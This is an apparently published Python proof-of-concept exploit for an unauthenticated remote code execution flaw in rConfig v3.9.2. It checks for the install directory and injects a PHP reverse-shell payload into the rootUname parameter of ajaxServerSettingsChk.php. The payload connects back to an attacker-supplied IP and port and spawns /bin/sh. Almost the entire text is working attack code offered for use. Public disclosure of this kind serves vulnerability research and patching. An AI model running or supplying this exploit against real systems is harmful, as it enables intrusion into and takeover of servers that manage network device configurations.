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Created September 20, 2019 08:16
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The script exploits a preauth RCE in rConfig v3.9.2
# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# Vendor Homepage:
# Software link:
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) != 4:
print "[+] Usage : ./ target ip port"
target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
install_path = target + "/install"
req = requests.get(install_path, verify=False)
if req.status_code == 404:
print "[-] Installation directory not found!"
print "[-] Exploitation failed !"
elif req.status_code == 200:
print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
print "[+] Triggering the payload"
print "[+] Check your listener !"
requests.get(url_to_send, verify=False)
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